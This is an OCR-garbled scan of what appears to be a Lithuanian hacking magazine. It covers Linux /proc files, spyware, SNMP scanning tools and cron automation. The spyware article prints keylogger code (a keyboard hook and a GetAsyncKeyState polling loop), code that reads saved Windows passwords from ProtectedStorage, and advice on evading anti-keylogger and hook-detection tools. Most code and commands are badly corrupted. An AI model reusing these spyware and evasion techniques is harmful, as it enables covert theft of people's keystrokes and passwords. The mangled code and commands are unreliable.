tiek ilgesnis, nei tu manai ;). Pavyzdžiui, pas mane sąraše yra 
bdev, sockfs, pipefs, eventpollfs. Kad branduolys veiktų teisingai, 
reikia jų visų. Kokios iš šių FS sumontuotos einamu metu, tau 
pasakys byla /proc/mounts, kurios formatas identiškas /etc/fstab 
konfigui. Informacija apie sumontuotas swap sritis pateikiama 
byloje /proc/swaps. 

Be aukščiau išvardintų bylų taip pat egzistuoja katalogas /proc/S, 
kuriame, Unix kūrėjų sumanymu, turėtų būti patalpinama bet kokia 
failų sistemų tvarkyklių informacija. Realiame gyvenime čia galima 
rasti tik informacija apie NFS tvarkyklę, reiserfs failų sistema ir, jeigu 
įdiegtas atitinkamas pataisymų paketas, no supermount. Atkreipk 
dėmesį: jeigu tu nori gauti reiserfs statistiką, tau teks branduolyje 
įjungti opciją File systems -> Stats in /proc/fs/reiserfs. 


[Tinklas] Visa tinklo statistika saugoma bylose, kurios yra kataloge 
Iproc/net. Einami susijungimai išvardinti top, udp ir unix bylose. Iš 
esmės čia pateikiama ta pati informacija, kurią galima pamatyti 
su netstat, tik branduolio soketų lentelės formatu. Tai reiškia, 
kad visi duomenys pateikiami šešioliktainiu formatu (įskaitant IP 
adresus Ir jungtis), o susijungimų būseną identifikuoja skaičius. 
„Žalių“ soketų lentelė yra byloje raw. Maršrutizavimo lentelės turinį 
galima rasti byloje route. Paprasto žmogaus akims maloni infor- 
macija saugoma tik dvejose bylose: arp ir dev. Pirmoji — tai ARP 
lentelė (IP ir MAC adresų atitikmenų lentelė), o antroje saugoma 
tinklo įrenginių statistika, Byla dev pateikiama kaip lentelė iš trijų 
sekcijų: tinklo sąsajos, priimtų ir perduotų duomenų statistikos. 
Antrosios ir trečiosios sekcijos formatai vienodi, jas sudaro šie 
stulpeliai: bytes — bendras perduotos/priimtos informacijos kiekis, 
packets — perduoty/priimtų paketų skaičius, errs — paketų su 
neteisingomis antraštėmis skaičius, drop — atmestų (pavyzdžiui, 
ugniasienės) paketų skaičius, multicast — transliuojančių paketų 
skaičius. Visą šią informaciją panaudoja ifconfig, kurią apdorojus 
Išvedamas vartotojams priimtinas atsakymas. 


[Branduolinė buhalterija] Pagrindinė statistinės informaci- 
jos susikaupimo vieta branduolyje yra byla /proc/stat. Pirmoji 
eilutė, prasidedanti „cpu“, atvaizduoja duomenis apie tai, 
kiek laiko procesorius išeikvoja vartotojiškų programų kodui 
vykdyti (pirmasis skaičius), branduolio kodui vykdyti (trečiasis 
skaičius), kiek laiko procesorius „miega“ (ketvirtasis skaičius), 
kiek laiko laukia įvedimo/išvedimo operacijų įvykdymo (penk- 
tasis skaičius) ir kiek laiko sunaudojama pertraukimų apdoro- 
jimui (šeštasis skaičius). Likę stulpeliai nėra tokie įdomūs. 
Duomenys pateikiami šimtosiomis sekundės dalimis. Noriu 
pastebėti, kad normaliai veikiančioje sistemoje procesoriaus 
nieko neveikimo laikas bus keletą kartų didesnis už jo darbo 
laiką. Likusios eilutės nėra tokios įdomios, tačiau keletą iš 
jų aš vis dėlto pakomentuosiu. Btime — sistemos užkrovimo 
laikas sekundėmis, skaičiuojant nuo 1970 metų sausio 1. 
Processess — bendras nuo sistemos užkrovimo momento 
atsiradusių procesų kiekis. 

Tokią daugeliui svarbią informaciją, kaip vidutinis procesoriaus 
apkrovimas, galima sužinoti iš bylos /proc/loadavg. Daugelį 
naujokėlių jos turinys glumina. O iš tiesų čia viskas labai 
paprasta, nors ir neįprasta. Trys skaičiai parodo užduočių 
(procesų) kiekį, kurie laukė savo įvykdymo per paskutines 1, 
5 ir 15 minučių. Taigi jeigu per minutę savo vykdymo laukė 
vidutiniškai mažiau nei viena užduotis, tai apkrovimas yra apie 
5-1094, jeigu 2-3 užduotys — 80-9096, 0 4-5 užduotys reiškia 
10096 apkrovimą. Daugelis programų, kurios apskaičiuoja 
procentinį procesoriaus apkrovimą, duomenis gauna būtent 
iš šios bylos. 

Nuo užkrovimo momento praėjęs laikas yra byloje /proc/uptime.. 
Byloje yra du skaičiai: bendras laikas ir procesoriaus prastovos 
laikas. Atskaita fiksuojama sekundėmis. Pas mane antrasis skaičius 
vos šimtu mažesnis Už pirmąjį :). 


[Kas liko už kadro] O už kadro pas mus šiandien liko pseudo- 
byla /proc/kcore. Ji visą fizinę sistemos atmintį atvaizduoja core 
formatu, todėl leidžia realiu laiku analizuoti vidines branduolio 
struktūras. Norint pasinaudoti šia galimybe, reikia užkrauti de- 
rinimo informaciją priimantį branduolį (jis po sukompiliavimo 
įrašomas į išeities tekstų šaknį: /usr/src/vmlinux) ir root vardu 
įvykdyti šią komandą: 


$ gdb 00 /pulkoe 


Atkreipk dėmesį, jog ši byla nebus sukurta, jeigu branduolyje 
atjungta opcija File systems -> Pseudo filesystems > /proc/kcore 
support. 

Šiame straipsnyje aš taip pat praleidau branduolio našumo didinimą 
(tuning) /proc/sys (arba sysct!) priemonėmis, tačiau tai jau atskiro 
straipsnio tema. 
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„Spyware“ enciklopedija 
Kaip ir ką vagia šiuolaikinės 
šnipinėjančios programos | 
ŠIANDIEN VISI VIENI KITUS ŠNIPINĖJA. 
REIKIA PASTEBĖTI, KAD TAME NĖRA 
NIEKO GERO. PRIVISO PROGRAMŲ, 
KURIŲ TIKSLAS VIENAS VIENINTE- 
LIS — IŠ KOMPIUTERIO RINKTI VISĄ 
ĮMANOMĄ INFORMACIJĄ IR JĄ KAM 
NORS IŠSIŲSTI. ŠIŲ PROGRAMŲ KLASĖ 
BUVO PAKRIKŠTYTA NUOSTABIU ŽODELIU 
SPYWARE. BEJE, TAME TAIP PAT NIEKO 
GERO. GERAI TIK TAI, KAD ŠIANDIEN 
MES IŠSIAIŠKINSIM, KOKIE BŪNA ŠIE 
NEMALONŪS ŠNIPINĖJIMO ĮRANKIAI, 
KAIP JIE REALIZUOJAMI IR KAIP NUO JŲ 
APSISAUGOTI. 

Visų pirma griežtai apibrėžkime spyware sąvoką. Spare — tai 
programa, kuri be vartotojo leidimo renka kokią nors 
kompiuteryje saugomą informaciją ir išsiunčia ją savo 
šeimininkui. Spyware kategorijai vienareikšmiškai galima 
priskirti įvairiausius keyloggerius, formgrabberius ir 
Pinch tipo slaptažodžių trojanus. Vis dėlto AntiSpyware 
programinės įrangos gamintojai tokio griežto apibrėžimo 
nesilaiko ir į savo signatūrų bazes prideda tokias progra- 
mas, kurios jokiu būdu negali būti priskirtos šiai kategorijai 
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(pavyzdžiui, NetBus tipo trojanai, kuriuose apie jokias šnipinėjimo 
funkcijas nė neužsimenama). Šiuo principu veikia ZoneAlarm ir 
Outpost Firewall (pastarajame toks modulis atsirado visai neseniai, 
išleidus 3.0 versiją) AntiSpyware moduliai, taip pat AVZ, Trojan- 
Remover, Microsoft AntiSpyware ir daugelis kitų programų. Tokių 
apsaugų suteikiama nauda gana abejotina. Jos veikia taip pat, 
kaip ir antivirusai, o tai reiškia, kad jos nemoka atpažinti naujų 
šnipinėjimo programų ir modifikuotų senų programų versijų. Be 
to, bet kuris antivirusas su signatūrine paieška su šia užduotimi 
susitvarko kur kas geriau už tokias programas. 

Vis dėlto egzistuoja ir tokie AntiSpyware įrankiai, kurie remiasi ne 
konkrečių šnipinėjimo programų paieška, o bando aptikti jų veikimui 
būdingus požymius. Tokios programos užtikrina neblogą apsaugos 
lygi, o siekiant jas apeiti reikia aiškiai suvokti jų darbo metodus. 
Straipsnio pabaigoje aš išsamiai aptarsiu keletą tokių programų, 0 
kol kas pabandykime išsiaiškinti, kokius būtent duomenis medžioja 
piktieji šnipai. 


[Keyloggeriai] Keyloggeriai, arba dar kitaip vadinami klaviatūros 
šnipai, — tai plačiausiai paplitęs šnipinėjimo programų tipas. Šios 
programos atsirado dar seno gero DOS'o laikais, o dabar tarp 
keyloggerių realizacijų galima rasti tokių variantų, kurie skirti visoms 
Windows versijoms, Linux ir net BSD sistemoms. Kaip tu tikriausiai 
ir pats supranti, šios šnipinėjančios programos užsiima tuo, kad 
tyliai registruoja visą su klaviatūra (ir pele) įvedamą informaciją. 
Tai gali būti slaptažodžiai, tiek susirašinėjimas elektroniniu paštu, 
todėl šio spyware tipo aprėpiama sritis gana padori. 

Windows sistemoje daugelis klaviatūros šnipų sukurti kaip 
nesudėtingas hukas (hook) ant vieno iš sisteminių įvykių. Tokiam 
hukui aktyvuoti naudojama funkcija SetWindowsHookEx. Siekiant 
perimti klavišų nuspaudimus, stebimi WH GETMESSAGE arba 
WH KEYBOARD įvykiai. Pirmuoju atveju huko callback funkcija 
gaus visus lango pranešimus, o antruoju — tik WM KEYDOWN ir 
WM KEYUP Hukus apdorojanti procedūra turi būti d!/ bibliotekoje, 
kuri bus užkrauta su visais pranešimų eilę turinčiais procesais 
(tai visi GUI procesai). Po to lango pranešimas su SendMessage 
perduodamas į pagrindinį keyloggerio procesą, kur ir atliekamas 
logo išsaugojimas į diską arba jo persiuntimas tinklu. Hukas ak- 
tyvuojamas štai taip: 


hHook = SetWindowsHookEx(WH KEYBOARD, KeyboardPioc, hlnstance, O) 


Funkcija KeyboardProc ctrodys maždaug taip: 
LRESULT CALLBACK KeyboordProclint code, WPARAM wParam, LPARAM IPoram) 
i 
iode 1= HC NOREMOVĖ) 
ii(Paom < 0) 
ikode == HC ACTION) ( 
hwnd = FindWindows:Windowass, s2WindowNone); 
Sendhlessege(hwnd, WI. LOGGERB, wParom, IParon); 
) 


return CallNextHookEx(NULL, code, wParam, |Poram); 


Kaip matai, šį metodą labai paprasta įgyvendinti, tačiau jis turi 
rimtą trūkumą — tam būtina dl! biblioteka. Dėl tokios dl! bylos 
užkrovimo keiksis visos šiuolaikinės ugniasienės, todėl iš šio me- 


todo mažai naudos, nors jis vis dar naudojamas daugelyje spyware 
programų. 

Šią problemą galima išspręsti panaudojant funkciją GetAsyn- 
cKeyState, kuri jos iškvietimo momentu gauna informaciją apie 
Klaviatūros būseną (kokie klavišai nuspausti). Funkcijai vietoje 
argumento perduodamas tikrinamo klavišo kodas, o ji grąžina 
klavišo būsenos kodą. Norint skenuoti visą klaviatūrą, mes turime 
periodiškai iškviesti GetAsyncKeyState su visų sekamų klavišų ko- 
dais ir stebėti jų būsenos pasikeitimus. Informacijos apie klaviatūros 
būseną saugojimui naudojamas 95 elementų masyvas, užpildytas 
tokio formato struktūromis: 


Yyedef sud VIABIE( 
im VIR KET, 
TOIAR Des 

J VIABLĘ 


VIR KEY — tai tikrinamo klavišo kodas, o Des — klavišo būsena. 
Tokiu atveju klaviatūros skenavimo ciklą vykdantis kodas atrodytų 
štai taip: 


torli=0i<94i+ +) 
(GetAsyncKeyState(VKeysli].VIR KEY) 8 0x00000001) 
if(GetAsynckeyStote(VKeys[i].VIR KEY) 8 0x8000000) ( 
(Vkeysli] VIR KEY >=0441) 88 (Vheysli].VIR KEY < =055A))( 
i GeikeyStote(VK CAPITAI) 8 05000000001 ) 
( GeikeyState(VK SHIFT) <0 ) ) ) ( 
wsprintf(IeyDota,“Yoc“, (TCHAR)tolower(Vkeys[i].VIR KEY); 
res=WriteFile(hFile,(LPCVOID)KeyData,1,4BW,NULL); 
i(res= =0) SendMessage(hwnd.WM DESTROY,0.0); 
break: 


i (GetKeyStos(VK. SKHIFT) <0) 88. Istros(Vheys[i.VIR KE) ) ( 
wsprit(KeyDola, "866" (TCHAR)Transkey( Keys] IR NET); 
vs Vifi (POVOO Don, EBM AUU); 


Wsprinit(KeyData,“Oks“ Nkeysli]. Des); 
1es= WriteFile(hFile (LPCVOIO)Key Dato,strlen(VKeysli]. Des), 88W,NULŲ); 
itlies= =0) SendMessage(hwnd,WM DESTROY,0.0); 

) 


Norint gauti pakenčiamą logą, šį ciklą reikia kartoti periodiškai kas 
100 ms. Toks klaviatūros įvedimo sekimo būdas nereikalauja jokių 
bibliotekų, tačiau išsiskiria tam tikru nestabilumu, t.y. negarantuoja 
visų nuspaustų klavišų perėmimo. 

Formgrabberiai 

Formgrabberiai naudojami informacijai apie įvairių svetainių lanky- 
mo statistiką surinkti ir jose išsiunčiamai informacijai analizuoti. 
Grubiai šnekant, jie perima viską, ką vartotojas įveda naršyklėje 
matomose formose. 

Formgrabberiai turi nedidelį porūšį — TAN-grabberius. Jų ypatybė 
ta, kad jie nukreipti prieš bankų sistemų vartotojus, moka 
atpažinti perimamą informaciją ir savo šeimininkui išsiųsti tik rei- 
kiamus duomenis. Taip pat jie moka ne tik šiuos duomenis gauti, 


bet ir blokuoti jų siuntimą į 
banko svetainę, kad sąskaitos 
šeimininkas negalėtų ja pasi- 
naudoti iki tol, kol jį apvogs. 
Pažangiausi TAN-grabberiai 
moka atjungti įvairias bankų 

svetainėse įdiegtas apsaugas (pavyzdžiui, apribojimus priėjimui 

pagal IP), imituodami sistemos vartotojo nustatymų konfigūravimo 
veiksmus. Ši šnipinėjančių programų rūšis yra pavojingiausia, ka- 
dangi ji orientuota į realių pinigų vagystę. Norėčiau tave įspėti dėl 
tokio tipo programų kūrimo ir pardavimo, kadangi tai tiesiausias 
Kelias už grotų. 


Anuviusinį įrankį AVZ, apie Kurį 
buvo kalbama straipsnyje, tu 
gali gauti čia: http:!/z-oleg 
comisecuriavz. hm 


ĮSiaptažodžių trojanai] Daugeliui hakerių neįdomus vartotojo 
asmeninis gyvenimas ir net jo kreditinės kortelės. Jiems tiesiog 
reikia pagrobti vartotojo elektroninį paštą, ICO UIN'ą arba dar ką 
nors panašaus. Tam ir yra skirti slaptažodžių trojanai, pavyzdžiui, 
tokie, kaip labai labai populiarus Pinch. Dažniausiai jie veikia vi- 
enu ir tuo pačiu nelabai sudėtingu principu — tiesiog paima visus 
slaptažodžius ;). 

Windows NT sistemoje yra specialus servisas, skirtas privačių duomenų 
saugojimui, kuris vadinasi ProtectedStorage. Internet Explorer 
slaptažodžių ir formų automatinio užpildymo duomenų saugojimui 
naudoja būtent šį servisą. Jį savo slaptų duomenų saugojimui taip 
pat naudoja MSN Messenger ir MS Outlook. Žodžiu, trojanų kūrėjai 
turėtų padėkoti didžiajai ir siaubingajai „Microsoft“, kuri susigalvojo 
visus slaptažodžius saugoti vienoje vietoje, dėl ko smarkiai palengvino 
trojanų kūrėjų gyvenimą. ProtectedStorage peržiūrai galima panaudoti 
programą Protected Storage Explorer, tačiau tave greičiausiai domina 
ne pats įrankis, o jo veikimo principas. Ką gį, tuojau papasakosiu. 
Darbui su ProtectedStorage naudojamos funkcijos iš bibliotekos 
pstorec.dll, kuri įeina į Windows sudėtį. Viskas prasideda nuo 
funkcijos PStoreCreatelnstance, kuri sukuria /PStore klasės objektą. 
Čia, kaip tu supranti, mes susiduriame su tuo prakeiktu OOP tačiau 
dėl to neverta kristi ant žemės ir isterikuoti drabstant iš burnos 
putas. Pakanka suprasti, kad klasė yra tam tikra struktūra, kurioje 
saugomos rodyklės į jos metodus. Žinant šią struktūrą, galima 
iškvietinėti klasės metodus nenaudojant C+ + ir OOP galimybių, o 
tai reiškia, kad šiuo atveju galima su grynu API rašyti labai mažas 
programas, kas trojanų kūrėjui yra išties svarbu. 

Taigi prie darbo. Iš pradžių mums reikia užkrauti pstorec.dll, im- 
portuoti funkciją PStoreCreatelnstance ir sukurti IPStore klasės 
egzempliorių: 


typadef HRESULT (WINAPI *1PStoreCieatelnstance) 
(IPStoe **, DWORD, DWORD, DWORO); 
HMODULE hpsDLL; 
hpsDLL = Loodlibrory(,pstorec.all“); 
1PSioreCreotelnstance pPStoreCreaielnstance; 
pPStoreCieatelnsance = ((PStosCientelnstance) 
GelProckddress(hpsDLL, „PStore(ieatelnstance“); 
IPSiorePir PStor; 
HRESULT hRes = pPSiore(reotelnstance(RPStore, O, 0, 0); 


Dabar mums reikia gauti /EnumPStoreTypes sąsają (interface), per 
kurią mes išvardinsime ProtectedStorage įrašų tipus: 


IEnumPStorelypesPir EnumPStorelypes; 
hRos = PStore->Enumlypes(0, 0, 8EnumPStorelypes); 
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Dabar parašysime tipų perrinkimo ciklą, o kiekvienam įrašo tipui su 
ta pačia sąsaja išvardinsime jo potipius. Kiekvienam įrašo tipui mes 
gauname TypeGUID — unikalią skaitinę duomenų tipą aprašančią 
reikšmę. Sulyginus šį tipą su žinomais tipais, kuriuos naudoja 
Internet Explorer, Outlook Express ir kitos panašios programos, 
mes gausime hakerį dominančius įrašus. Dabar mes su IPStore 
klasės metodu Readltem galime perskaityti bet kokį įrašą. Aš čia 
nepateiksiu pilno kodo, kadangi jis užima daug vietos. 

Nesitikėk ProtectedStorage saugykloje rasti išsaugotų prisijungimo 
per modemą (dial-up) slaptažodžių, nes jų čia nėra. Norint juos 
gauti, reikia dirbti su RAS (Remote Access Service). Šis servisas 
turi visas išsaugotų slaptažodžių išvardinimui ir skaitymui reikalingas 
funkcijas (GetRasEntryCount, RasEnumEntries, GetLSAData, Ras- 
GetEntryProperties). Pilnus slaptažodžių išgavimo algoritmo išeities 
tekstus tu gali peržiūrėti atitinkamame trojano Pinch modulyje. 


ĮStatistikos surinkimo sistemos] Šios kategorijos spyware 
programos menkai pavojingos ir yra skirtos informacijai apie 
kompiuteryje įdiegtą programinę įrangą, lankomas svetaines 
ir t.t. surinkti. Viso šio reikalo realizacija labai paprasta 
(paprasčiausias bylų ir sisteminio registro įrašų išvardinimas). 
Be to, užduotį šiuo atveju smarkiai palengvina Temporary In- 
ternet Files katalogas, kuriame Internet Explorer išsaugo visą 
svetainių lankymo Istoriją. Kai kurios šios klasės programos arba 
integruojasi į Internet Explorer (įdiegiamos kaip įrankių juosta 
arba Shell Extension), arba naudoja kitus paslėpto automatinio 
užkrovimo metodus. Integravimas į IE dažniausiai reikalingas 
siekiant apeiti ugniasienes. Nors jos ir turi komponentų kontrolės 
priemones ir pateikia perspėjimą, paprastai į tai niekas nekreipia 
dėmesio. Nors šios programos ir nėra laikomos labai baisiomis, 
tačiau jos paprastai turi automatinio atsinaujinimo sistemą, 
o tai reiškia, kad bet kuriuo metu jos gali būti panaudotos 
kokiam nors sudėtingesniam dalykėliui užkrauti. Dažnai tokios 
programos užkraunamos į daugelį mašinų, jas skenuoja, o po 
to surinkti duomenys panaudojami nustatyti, ar kompiuteryje 
yra kas nors naudingo (pavyzdžiui, kreditinių kortelių numeriai), 
Į tokius kompiuterius užkraunamas labiausiai tokiam atvejui 
tinkamas trojanas, pavyzdžiui, per Spyware automatinio atnau- 
Jinimo sistemą. 


Protected Storage Explorer 


Protected Storage Explorer 


antirusinis įrankis AVZ 


[Apsauga nuo „Spyware“] Skydas ir kalavijas. Spyware ir AntiSpy- 
ware. Pažiūrėkime, ką gi yra paruošę legalios programinės įrangos 
gamintojai, kad apsaugotų mus nuo negerųjų šnipų. Beje, apžvelgsime 
ne tas programas, kurio spyware ieško ir pašalina remdamosi 
signatūromis, o tas, kurios šnipinėjančius kenkėjus atpažįsta pagal 
jiems būdingus veikimo principus. Pradėsime nuo jau paminėtos 
programos AVZ. Be signatūrinės paieškos, ši programa turi galimybę 
aptikti API perėmimus (tiek user mode, tiek ir branduolio lygyje) Ir 
skenuoti LSP (Winsock Layered Service Provider). Kaip tu jau tikri- 
ausiai pameni, API perėmimus naudoja kai kurie formgrabberiai, 
kurie taip gauna formų duomenis, taip pat daugelis trojanų, kurie 
taip nori nuslėpti savo buvimą sistemoje. AVZ gali surasti ir parodyti 
tokį perėmėją. Taip pat naudinga ir su SetWindowsHookEx hukais 
veikiančių keyloggerių aptikimo galimybė. Kovai su keyloggeriais taip 
pat skirtos tokios specialios programos, kaip HookMonitor, AntiKeylog- 
ger ir PrivacyKeyboara. Jos užtikrina apsaugą nuo plačiai naudojamų 
keylogginimo metodų. Pavyzdžiui, AntiKeylogger branduolyje perima 
NtUserSendMessage, NtUserSetWindowsHook, NtUserGetKey- 
boardState funkcijas ir uždraudžia tokius veiksmus, kaip klaviatūros 
hukų aktyvavimas, klaviatūros skenavimas per GetAsyncKeyState ir 


teksto gavimas iš langų pasiunčiant WM GETTEXT pranešimą. Šios 
programos net sugeba blokuoti tvarkyklių keyloggerius, kurie naudoja 
klaviatūros tvarkykles-filtrus. Tie, kas naudojasi tokiomis programomis, 
paprastai savo kompiuteryje turi vertingos informacijos, kurią kas 
nors gali norėti pagrobti. Dėl to hakeriui būtinai reikia apeiti panašias 
apsaugos priemones. Aptarsime visus informacijos praėjimo etapus: 
nuo klaviatūros iki ją gaunančios programos, kad suprastume, kur ją 
galima perimti ir kur šis procesas gali būti aptiktas: 

1. Klaviatūros tvarkyklė priima jos pertraukimą ir nuskaito informaciją 
| savo buferį. 

2. Win32 serverio posistemės procesas (csrss.exe) klaviatūros 
tvarkyklei pasiunčia IRP su informacijos gavimo užklausa. 

3. Klaviatūros tvarkyklė grąžina IRP paketą su informacija, pakeliui 
paketas praeina įdiegtų klaviatūros filtrų grandinę. 

4. csrss.exe apdoroja atkeliaujančią informaciją ir per win32k.sys 
tvarkyklės funkcijas išsiunčia langų pranešimus jų laukiantiems 
procesams. 

5. Pranešimą gaunantis procesas iškviečia GetMessage. Ši funk- 
cija valdymą perduoda branduoliui, kur iš win32k.sys per šešėlinę 
sisteminių servisų lentelę (Shadow SDT) iškviečiama NtUserGet- 
Message. 

6. Procesas perduoda pranešimą funkcijai TranslateMessage, kuri 
pranešimą gali perduoti funkcijos NtUserTranslateMessąge bran- 
duoliui, tačiau klaviatūros pranešimams tai nėra daroma. 

7. Pranešimas perduodamas klaviatūros hukams, jeigu jie aktyvuoti. 
8. Procesas perduoda pranešimą funkcijai DispatchMessage, po 
ko jis išsiunčiamas lango procedūrai. 

9. Įvykdžius lango procedūrą, pranešimas grįžta atgal į branduolį. 
Kaip matai, informacijos kelias įvedant ją klaviatūra ganėtinai 
sudėtingas, ir apsauginės programos negali tavęs apsaugoti nuo 
informacijos perėmimo visame šiame kelyje. AntiKeylogger ir Pri- 
vacyKeyboard gali apsaugoti tik 1, 3 ir 7 sritis, iš ko išplaukia, kad 
hakeriui lieka daugybė galimybių parašyti tokį keyloggerį, kuris apeis 
Visas tokias apsaugas. Pavyzdžiui, informaciją galima perimti bet 
kurioje jos apdorojimo branduolyje stadijoje (modifikuojant Shadow 
SDT arba vienos iš funkcijų kodą), tačiau kol kas tai nėra būtina, ka- 
dangi galima apseiti su user mode API funkcijų perėmimu. Taip pat 
galima perimti TranslateMessage funkciją ir visus langų pranešimus 
gauti taip, lyg mes būtume aktyvavę klaviatūros huką. 

Tarkim, mes turime veikiantį API perimantį keyloggerį. Dabar hakeris 
susidoros su AVZ ir kitomis panašiomis perėmimus aptinkančiomis 
programomis. Kad ir kaip tai būtų paradoksalu, tačiau geriausias 
būdas nuslėpti perėmimą — tai jo iš viso neaktyvuoti. Pavyzdžiui, 
Jeigu apdorotojas yra su visais procesais užkraunamoje DLL bibli- 
otekoje, tai galima tiesiog neaktyvuoti perėmimo avz.exe procese, 
tuomet AVZ jų nepamatys. Šį metodą paprasta realizuoti, tačiau jis 
nėra tinkamas naudoti rimtame produkte. Geriau tiesiog naudoti 
tuos perėmimo metodus, kurių neaptinka tokio tipo programos. 
Pavyzdžiui, galima su disasembleriu praeiti per visą funkciją, surasti 
komandą retir priešją įterpti push su savo kodo adresu. Šio veiksmo 
prasmė tame, kad stekas funkcijos pabaigoje analogiškas stekui 
Jos pradžioje, push perrašys grįžimo adresą ir ret perduos valdymą 
hakeriškam kodui, kuris apdoros funkcijos įvykdymo rezultatus. 


ĮŠtai ir pasaka baigta...] Nuo šiuolaikinių šnipinėjimo programų 
nėra jokios patikimos apsaugos, išskyrus galvą ir tiesias rankas. 
Nepadės nei antivirusas, nei ugniasienė, nei specialios programos. 
Tik spyware programų veikimo supratimas padės apsisaugoti nuo 
šios negandos. Tikiuosi, ši medžiaga tau pravers. 


0) 


Su kokia programine įranga tinkle galima ieškoti 
valdymą per snmp pripažįstančių įrenginių? 


Neblogas įrankis yra snscan (www.foundstone. 
com), kuris gali greitai ir tiksliai identifikuoti tinkle 
veikiančius SNMP įrenginius. Jis leidžia nuskenuoti 
adresų diapazoną, patikrinti atidarytas jungtis ir parinkti 
priėjimo eilutes, kurias galima surašyti į bylą. Ataskai- 
toje įrankis išveda surastų įrenginių adresus, priėjimo eilutes 
Ir papildomą informaciją apie įrenginį. Kitas įrankis, kurį taip 
pat rekomenduočiau, yra IP Network Browser (www.solar- 
winds.net). Kitaip nei snscan, ši programa suteikia daugiau 
galimybių ir neapsiriboja tik tinklo skenavimu. Su šiuo įrankiu 
galima peržiūrėti arba pakeisti surastų įrenginių nustatymus. 
*nix sistemose galima naudoti NET-SNMP paketą (anksčiau jis 
buvo žinomas kaip UCD-SNMP), kuris turi įvairiausias darbo su 
snmp priemones, įskaitant plečiamą agentą, SNMP biblioteką, 
informacijos užklausimo ir nustatymo per SNMP agentus prie- 
mones, SNMP signalų generavimo ir apdorojimo priemones, 
SNMP protokolą naudojančios unix komandos „netstat' versiją, 
taip pat priemonę Tk/peri skirtai valdymo informacijai peržiūrėti. 
Taip pat galima pasinaudoti su per! parašytu įrankiu Cisco torch, 
kuris skirtas masiniam skenavimui, Cisco maršrutizatorių ap- 
tikimui ir eksploatavimui. Programa naudoja keletą taikomųjų 
tarnybų pirštų antspaudų nuėmimo metodų. Cisco torch greitai 
aptinka tinklo mazgus su paleistais telnet, SSH, Web, NTP ir 
SNMP servisais, prieš aptiktus servisus panaudoja ataką pagal 
žodyną, Cisco torch gali rasti čia: http://arhont.com. 
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Prisukamas pingvinas 
Automatizuojame rutinišką darbą 
SUVOKIMAS, KAD KIEKVIENĄ MIELĄ 
DIENĄ TAU REIKIA ĮVEDINĖTI TAS PAČIAS 
KOMANDAS IR ATLIKINĖTI RUTINIŠKUS 
VEIKSMUS, GALI NULIŪDINTI BET KURĮ 
UNIKSOIDĄ. TACIAU NENUKABINK NOSIES, 
NES DIDŽIĄJĄ DALĮ DARBŲ GALI ATLIKTI 
PATI *NIX. DAUGELIS OS KOMPONENTŲ 
PATYS META UŽUOMINĄ APIE TAI, KAD 
JUOS PANAUDOTŲ SKRIPTUOSE IR PLAN- 
UOTOJO UŽDUOTYSE. SKAITYK TOLIAU 
IR SUŽINOSI, KAIP TAUPYTI SAVO LAIKĄ, 
PRIVERČIANT OPERACINĘ SISTEMĄ DARY- 
TI TAVO DARBĄ. 


[Naudok skriptus] Pirmasis žingsnis automatizavimo 
link — skriptų rašymas. Jeigu tu perprastum bent jau 
shell skriptinimo abėcėlę, manyk, kad pusė darbo pa- 
daryta. Tam, kad sistemos neapkrautum vienos ar dviejų 
eilučių ilgio skriptais, galima pasinaudoti /etc/profile arba 
—/.bashrc apibrėžtomis funkcijomis iš vartotojo pusės jos 
niekuo nesiskirs nuo skriptų. Žvilgtelėk į pirmąjį skriptą. 
Tai tik pavyzdys, demonstruojantis pagalbinių funkcijų pan- 
audojimo patogumą. Vis dėlto tu neprivalai iš karto kaip 
akis išdegęs pulti ir viską įvedinėti į —/.bashrc, priešingai, 
pagalvok, kokias komandas tu naudoji dažniausiai (bei kiek 
tai varginantis veiksmas), o po to apiformink jas funkcijų 
arba skriptų pavidalu. 

Įvaldyk planuotoją 


Tavo geriausiais draugais totalios automatizacijos link gali tapti cron 
ir at. Būtent jie atsako už procesų paleidimą foniniame režime. 
Cron demonas nuo senų laikų *nix sistemoje naudojamas kaip 
užduočių planuotojas. Jeigu tam tikrą komandą reikia paleisti 
kas tam tikrą laiko tarpą (kiekvieną valandą, kiekvieną naktį, kas 
mėnesį), tuomet šiai užduočiai nesurasi geresnės priemonės už 
cron. Pavyzdžiui, mes norime, kad kiekvieną dieną lygiai septintą 
valandą vakaro būtų paleidžiamas mūsų skriptas. Namų kataloge 
sukursime štai tokio turinio —/.crontab bylą: 


0 B š * 4 Aust/sinVouescipt 


Mistiniai skalčiai ir žvaigždutės prieš skripto pavadinimą reiškia 
šio skripto paleidimo laiką, kuris nurodomas tokia tvarka: minutė, 
valanda, diena, mėnuo, savaitės diena, Šiuo atveju žvaigždutės 
reiškia, kad skriptas turi būti vykdomas kiekvieną mėnesio dieną. 
Dabar įvykdykime komandą 


S doniob —/croniob 


Telieka sulaukti 19:00 ir mėgautis rezultatu. Keletas pastabų: 

1. Crontab aprašytos komandos vykdomos su interpretatoriumi 
/bin/sh bei su trimis aplinkos kintamaisiais: USER, HOME ir SHELL. 
Kadangi kintamasis PATH nėra apibrėžtas, tu turi nurodyti pilną 
kelią iki savo skripto ar bet kokios kitos programos. 

2. Jeigu sistemoje sukonfigūruotas lokalus paštas, tai visas koman- 
dos išvedimas išsiunčiamas vartotojui elektroniniame laiške. 
Viso labo vienos ar dviejų užduočių vykdymui cron funkciona- 
Jumo gali atrodyti per daug. Tada geriau pasinaudoti komanda 
at. Ji kaip tik skirta vienkartiniam užduoties vykdymui, jos vidinė 
sandara paprastesnė. Kaip pavyzdį paleisime tą patį skriptą tuo 
pačiu laiku: 


S ai 1900 
at> Aust/bin/our-sript 
Cir-D 


Lobai paprasta ir gražu, tiesa? 


A vi —/būshic 
> torbz2 archyvo katalogo sukūrimas 
funciion 1622() ( 
ii [$4 1= 0 || ton 
tr a S | bzip2 92 > Sin? 
fi 


) 
+ tarbz2 archyvo išpokovimas 
function: utbz2() ( 

ii [ SA 1= O |; ton 


2 Run golių cron Jobs Bt 4:40 every do 


4 Run week lų cron Jobs at 4:30 


ne Virst Gay Of the week 


4 Run sonthlų con Jobt at 4:20 00 the Hirst ds4 of the month 


"/Nar /spooL/cron/erontab „3815“ Z2L, 10546 sarmcano EI 


Siackware sistemoje naudojama Aarispool/eronlcrontabs!root byla 


tar xd SI 
h 
, 
* „protingos“ (D-ROM stalčiaus atidarymas: 
fundion ejeccd[) ( 
local cdiom= /mnt/cdrom 
Isof Scdiom 
if [ 8? ne 0 Į; hen 
ejedt Scdrom 


| 
+ (D atvaizdo (image) sukūrimos 
funcion cdimg() ( 
local cdrom=/mnt/cdrom 
